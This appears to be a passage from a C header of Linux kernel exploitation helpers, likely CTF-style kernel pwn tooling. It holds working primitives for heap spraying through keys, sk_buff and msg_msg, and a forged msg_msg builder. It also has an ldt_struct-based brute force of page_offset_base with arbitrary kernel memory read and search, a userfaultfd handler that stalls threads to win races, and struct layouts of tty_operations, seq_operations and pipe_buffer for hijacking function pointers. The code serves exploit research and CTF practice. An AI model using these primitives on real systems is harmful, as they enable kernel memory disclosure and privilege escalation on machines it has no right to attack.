#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

/**
 * @brief add a key of type "user" to the process keyring
 *
 * @param description description string of the key
 * @param payload payload of the key
 * @param plen length of `payload`
 * @return int result of the add_key syscall
 */
int key_alloc(char *description, void *payload, size_t plen)
{
    long key_id;

    key_id = syscall(__NR_add_key, "user", description, payload, plen,
                     KEY_SPEC_PROCESS_KEYRING);

    return (int) key_id;
}

/**
 * @brief replace the payload of a key (KEYCTL_UPDATE)
 *
 * @param keyid id of the key
 * @param payload new payload
 * @param plen length of `payload`
 * @return int result of the keyctl syscall
 */
int key_update(int keyid, void *payload, size_t plen)
{
    long rc = syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);

    return (int) rc;
}

/**
 * @brief read the payload of a key (KEYCTL_READ)
 *
 * @param keyid id of the key
 * @param buffer destination buffer
 * @param buflen size of `buffer`
 * @return int result of the keyctl syscall
 */
int key_read(int keyid, void *buffer, size_t buflen)
{
    long rc = syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);

    return (int) rc;
}

/**
 * @brief revoke a key (KEYCTL_REVOKE)
 *
 * @param keyid id of the key
 * @return int result of the keyctl syscall
 */
int key_revoke(int keyid)
{
    long rc = syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);

    return (int) rc;
}

/**
 * @brief unlink a key from the process keyring (KEYCTL_UNLINK)
 *
 * @param keyid id of the key
 * @return int result of the keyctl syscall
 */
int key_unlink(int keyid)
{
    long rc = syscall(__NR_keyctl, KEYCTL_UNLINK, keyid,
                      KEY_SPEC_PROCESS_KEYRING);

    return (int) rc;
}

/**
 * V - sk_buff spraying related
 * note that the sk_buff's tail is with a 320-bytes skb_shared_info
 */
/* number of socket pairs used for spraying */
#define SOCKET_NUM 8
/* number of writes (sprayed buffers) issued per socket pair */
#define SK_BUFF_NUM 128

/**
 * the socket array should be declared like:
 * int sk_sockets[SOCKET_NUM][2];
 */

/**
 * @brief create the socket pairs used to spray sk_buff
 *
 * Fills every row of `sk_socket` with an AF_UNIX/SOCK_STREAM socket pair.
 *
 * @param sk_socket array of SOCKET_NUM fd pairs to fill
 * @return int 0 on success, -1 as soon as one socketpair() call fails
 */
int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
    int pair = 0;

    while (pair < SOCKET_NUM) {
        int rc = socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[pair]);

        if (rc < 0) {
            printf("[x] failed to create no.%d socket pair!\n", pair);
            return -1;
        }

        pair++;
    }

    return 0;
}

/**
 * @brief spray sk_buff by writing `buf` into every socket pair
 *
 * Issues SK_BUFF_NUM writes of `size` bytes on the first end of each of the
 * SOCKET_NUM pairs, pair by pair.
 *
 * @param sk_socket socket pairs created by init_socket_array()
 * @param buf data to write
 * @param size length of `buf`
 * @return int 0 on success, -1 as soon as one write() fails
 */
int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    const int total = SOCKET_NUM * SK_BUFF_NUM;

    /* one flat counter, decomposed into (pair, round) in the original order */
    for (int n = 0; n < total; n++) {
        int pair = n / SK_BUFF_NUM;
        int round = n % SK_BUFF_NUM;

        if (write(sk_socket[pair][0], buf, size) < 0) {
            printf("[x] failed to spray %d sk_buff for %d socket!", round, pair);
            return -1;
        }
    }

    return 0;
}

/**
 * @brief release the sprayed sk_buff by reading them back
 *
 * Issues SK_BUFF_NUM reads of up to `size` bytes on the second end of each of
 * the SOCKET_NUM pairs, pair by pair.
 *
 * @param sk_socket socket pairs created by init_socket_array()
 * @param buf buffer receiving the data
 * @param size size of `buf`
 * @return int 0 on success, -1 as soon as one read() fails
 */
int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    const int total = SOCKET_NUM * SK_BUFF_NUM;

    for (int n = 0; n < total; n++) {
        int pair = n / SK_BUFF_NUM;

        if (read(sk_socket[pair][1], buf, size) < 0) {
            puts("[x] failed to received sk_buff!");
            return -1;
        }
    }

    return 0;
}

/**
 * VI - msg_msg related
 */

/* fallback definition for libcs whose headers do not provide MSG_COPY */
#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

/*
 * Userspace stand-in for a message header: every member is a raw 64-bit
 * value. Presumably mirrors the kernel's struct msg_msg on the target
 * version -- TODO confirm the layout.
 */
struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

/* Stand-in for a message segment header: a single 64-bit `next` link. */
struct msg_msgseg {
uint64_t next;
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

/**
 * @brief create a new private System V message queue
 *
 * @return int result of msgget()
 */
int get_msg_queue(void)
{
    const int creation_flags = 0666 | IPC_CREAT;

    return msgget(IPC_PRIVATE, creation_flags);
}

/**
 * @brief receive a message from a queue with msgflg 0
 *
 * @param msqid id of the message queue
 * @param msgp buffer laid out like `struct msgbuf`
 * @param msgsz maximum size of the text part
 * @param msgtyp message type selector passed to msgrcv()
 * @return ssize_t result of msgrcv()
 */
ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const int no_flags = 0;
    ssize_t received = msgrcv(msqid, msgp, msgsz, msgtyp, no_flags);

    return received;
}

/**
 * @brief send a message on a queue with msgflg 0
 *
 * `msgp` should point to a `struct msgbuf` whose data is already stored in
 * msgbuf.mtext; its mtype field is overwritten with `msgtyp` before sending.
 *
 * @param msqid id of the message queue
 * @param msgp buffer laid out like `struct msgbuf`
 * @param msgsz size of the text part
 * @param msgtyp message type to stamp into the buffer
 * @return ssize_t result of msgsnd()
 */
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    struct msgbuf *header = (struct msgbuf *) msgp;

    header->mtype = msgtyp;

    return msgsnd(msqid, msgp, msgsz, 0);
}

/**
 * @brief read a message without removing it from the queue
 *
 * Calls msgrcv() with MSG_COPY | IPC_NOWAIT | MSG_NOERROR. With MSG_COPY,
 * `msgtyp` means "read the no.msgtyp msg_msg on the queue".
 *
 * @param msqid id of the message queue
 * @param msgp buffer laid out like `struct msgbuf`
 * @param msgsz maximum size of the text part
 * @param msgtyp index of the message to copy
 * @return ssize_t result of msgrcv()
 */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const int peek_flags = MSG_COPY | IPC_NOWAIT | MSG_NOERROR;

    return msgrcv(msqid, msgp, msgsz, msgtyp, peek_flags);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
 * VII - ldt_struct related
 */

/**
 * Sometimes we may want to compile the exp binary with MUSL-GCC, which
 * doesn't contain the `asm/ldt.h` file.
 * As the file is small, it is copied directly here :)
 */

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
 * Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
 * not to the default values if you still want to do syscalls. This
 * call is more for 32bit mode therefore.
 */
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
 * Because this bit is not present in 32-bit user code, user
 * programs can pass uninitialized values here. Therefore, in
 * any context in which a user_desc comes from a 32-bit program,
 * the kernel must act as though lm == 0, regardless of the
 * actual value.
 */
unsigned int lm:1;
#endif
};

/* values for user_desc.contents */
#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* this should be adjusted to match your kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/**
 * @brief fill a user_desc with the fixed values used by the LDT helpers
 *
 * Sets base_addr to 0xff0000, entry_number to 0x8000 / 8 and every other
 * field (limit and all flag bits) to 0.
 *
 * @param desc descriptor to initialise
 */
static inline void init_desc(struct user_desc *desc)
{
    /* the two non-zero fields */
    desc->entry_number = 0x8000 / 8;
    desc->base_addr = 0xff0000;

    /* everything else is cleared */
    desc->limit = 0;
    desc->seg_32bit = 0;
    desc->contents = 0;
    desc->read_exec_only = 0;
    desc->limit_in_pages = 0;
    desc->seg_not_present = 0;
    desc->useable = 0;
    desc->lm = 0;
}

/**
 * @brief brute-force page_offset_base by modifying ldt_struct
 *
 * Starting at 0xffff888000000000, each round points ldt_struct->entries at
 * the current guess through `ldt_momdifier` and tries to read 8 bytes with
 * modify_ldt(); a positive result ends the search.
 *
 * @param ldt_cracker function to make the ldt_struct modifiable
 * @param cracker_args args of ldt_cracker
 * @param ldt_momdifier function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param burte_size step added to the guess after each failed round
 * @return size_t address of page_offset_base, or -1 if modify_ldt() returned 0
 */
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
                                        void *cracker_args,
                                        void *(*ldt_momdifier)(void*, size_t),
                                        void *momdifier_args,
                                        uint64_t burte_size)
{
    struct user_desc desc;
    uint64_t guess = 0xffff888000000000;
    uint64_t probe;
    int nread;

    /* init descriptor info */
    init_desc(&desc);

    /* make the ldt_struct modifiable, then write one LDT entry */
    ldt_cracker(cracker_args);
    syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

    /* walk forward until modify_ldt() manages to read from the guess */
    for (;; guess += burte_size) {
        ldt_momdifier(momdifier_args, guess);
        nread = syscall(SYS_modify_ldt, 0, &probe, 8);

        if (nread > 0) {
            return guess;
        }

        if (nread == 0) {
            printf("[x] no mm->context.ldt!");
            return (size_t) -1;
        }
    }
}

/**
 * @brief read 0x8000 bytes from a specific kernel address.
 * Note that ldt_guessing_direct_mapping_area() should be called first,
 * and this function should be used in that same caller process.
 *
 * ldt_struct->entries is pointed at `addr`, then a forked child performs the
 * modify_ldt() read and ships the data back through a pipe.
 *
 * A failing pipe() or fork() is fatal (err_exit()).
 *
 * @param ldt_momdifier function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param addr address of kernel memory to read
 * @param res_buf buffer of at least 0x8000 bytes receiving the data
 */
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
                        void *momdifier_args, size_t addr, char *res_buf)
{
    static char buf[0x8000];
    size_t received = 0;
    int pipe_fd[2];
    pid_t pid;

    /* modify the ldt_struct->entries to addr */
    ldt_momdifier(momdifier_args, addr);

    if (pipe(pipe_fd) < 0) {
        err_exit("FAILED to create pipe for ldt_arbitrary_read()!");
    }

    pid = fork();
    if (pid < 0) {
        err_exit("FAILED to fork for ldt_arbitrary_read()!");
    }

    if (pid == 0) {
        /* child: read the data and hand it to the parent */
        close(pipe_fd[0]);
        syscall(SYS_modify_ldt, 0, buf, 0x8000);
        write(pipe_fd[1], buf, 0x8000);
        /* _exit(): do not flush stdio buffers inherited from the parent */
        _exit(0);
    }

    /*
     * parent: drain the pipe BEFORE waiting. If the pipe holds less than
     * 0x8000 bytes the child blocks in write() until we read, so waiting
     * first would deadlock. Closing our write end lets read() see EOF.
     */
    close(pipe_fd[1]);
    while (received < 0x8000) {
        ssize_t n = read(pipe_fd[0], res_buf + received, 0x8000 - received);

        if (n <= 0) {
            break;
        }
        received += (size_t) n;
    }
    close(pipe_fd[0]);

    /* reap exactly our reader, not some other child of this process */
    waitpid(pid, NULL, 0);
}

/**
 * @brief seek specific content in kernel memory.
 * Note that ldt_guessing_direct_mapping_area() should be called first,
 * and this function should be used in that same caller process.
 *
 * Memory is scanned upwards from `page_offset_base` in 0x8000-byte windows;
 * the loop only ends once `mem_finder` reports a hit.
 *
 * @param ldt_momdifier function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param page_offset_base the page_offset_base we leaked before
 * @param mem_finder your own function to search a 0x8000-byte buf.
 * It should look like `size_t func(void *args, char *buf)`, where `buf`
 * holds the data read from the kernel. It returns the offset of the hit
 * inside `buf`, or `-1` when this window contains nothing
 * @param finder_args your own function's args
 * @return size_t kernel address of the content that was found
 */
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
                          void *momdifier_args, uint64_t page_offset_base,
                          size_t (*mem_finder)(void*, char *), void *finder_args)
{
    static char buf[0x8000];
    size_t cursor = page_offset_base;

    for (;;) {
        size_t hit;

        ldt_arbitrary_read(ldt_momdifier, momdifier_args, cursor, buf);

        hit = mem_finder(finder_args, buf);
        if (hit != (size_t) -1) {
            return cursor + hit;
        }

        /* nothing in this window, move on to the next one */
        cursor += 0x8000;
    }
}

/**
 * VIII - userfaultfd related code
 */

/**
 * MUSL doesn't ship `userfaultfd.h` either :(
 * Luckily we only need a few macros for exploitation,
 * so defining them directly here is okay :)
 */

/* API version written into uffdio_api.api, and the ioctl command numbers */
#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/* read() structure: one event record as read from the userfaultfd */
struct uffd_msg {
uint8_t event;

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

/* event-specific payload; which member applies depends on `event` */
union {
struct {
uint64_t flags;
uint64_t address;
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

/* value of uffd_msg.event for a page-fault notification */
#define UFFD_EVENT_PAGEFAULT 0x12

/* argument of the UFFDIO_API ioctl */
struct uffdio_api {
uint64_t api;
uint64_t features;
uint64_t ioctls;
};

/* an address range: start address plus length */
struct uffdio_range {
uint64_t start;
uint64_t len;
};

/* argument of the UFFDIO_REGISTER ioctl */
struct uffdio_register {
struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode;
uint64_t ioctls;
};


/* argument of the UFFDIO_COPY ioctl */
struct uffdio_copy {
uint64_t dst;
uint64_t src;
uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

//#include <linux/userfaultfd.h>

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

/**
 * @brief userfaultfd monitor routine that parks the faulting thread
 *
 * Waits for an event on the userfaultfd, reads it, and then sleeps for
 * 100000000 seconds BEFORE doing anything else. The validation and the
 * UFFDIO_COPY below are only reached once that sleep returns, so the thread
 * that triggered the fault stays blocked for that whole time.
 *
 * @param args the userfaultfd, passed as an integer cast to `void *`
 * @return void* NULL, after the first event has been fully handled
 */
void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
int fault_cnt = 0; /* never used below */
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
/* block (no timeout) until the userfaultfd has an event */
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* just stuck there is okay... */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

/* resolve the fault by copying temp_page_for_stuck over the faulting page */
uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

/* returning here means the loop body runs to completion at most once */
return NULL;
}
}

/**
 * @brief register a range whose faults are served by
 * uffd_handler_for_stucking_thread()
 *
 * @param monitor_thread receives the id of the created monitor thread
 * @param buf start of the range to monitor
 * @param len length of the range to monitor
 */
void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
                                              void *buf, unsigned long len)
{
    void *(*stuck_handler)(void *) = uffd_handler_for_stucking_thread;

    register_userfaultfd(monitor_thread, buf, len, stuck_handler);
}


/**
 * IX - kernel structures
 */

/* opaque kernel types that are only ever referenced through pointers here */
struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

/*
 * Userspace copy of struct seq_file. The mutex is replaced by four 64-bit
 * words; presumably that matches sizeof(struct mutex) on the target kernel
 * -- TODO confirm.
 */
struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
uint64_t lock[4]; //struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

/* Function-pointer table referenced by seq_file.op: four callbacks, 0x20 bytes on 64-bit. */
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

/*
 * Userspace copy of the tty function-pointer table.
 * NOTE(review): the member order presumably follows the target kernel's
 * struct tty_operations -- verify against the kernel version being attacked
 * before relying on member offsets. The three poll_* members only exist when
 * CONFIG_CONSOLE_POLL is defined at compile time.
 */
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

/* opaque kernel types that are only ever referenced through pointers here */
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/*
 * Userspace copy of one pipe buffer slot.
 * NOTE(review): the original note read "read start from len to offset, write
 * start from offset"; presumably `offset` is where the valid data begins
 * inside `page` and `len` is how many bytes are valid -- confirm.
 */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

/* Function-pointer table referenced by pipe_buffer.ops. */
struct pipe_buf_operations {
/*
 * ->confirm() verifies that the data in the pipe buffer is there
 * and that the contents are good. If the pages in the pipe belong
 * to a file system, we may need to wait for IO completion in this
 * hook. Returns 0 for good, or a negative error value in case of
 * error. If not present all pages are considered good.
 */
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
 * When the contents of this pipe buffer has been completely
 * consumed by a reader, ->release() is called.
 */
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
 * Attempt to take ownership of the pipe buffer and its contents.
 * ->try_steal() returns %true for success, in which case the contents
 * of the pipe (the buf->page) is locked and now completely owned by the
 * caller. The page may then be transferred to a different mapping, the
 * most often used case is insertion into different file address space
 * cache.
 */
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
 * Get a reference to the pipe buffer.
 */
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif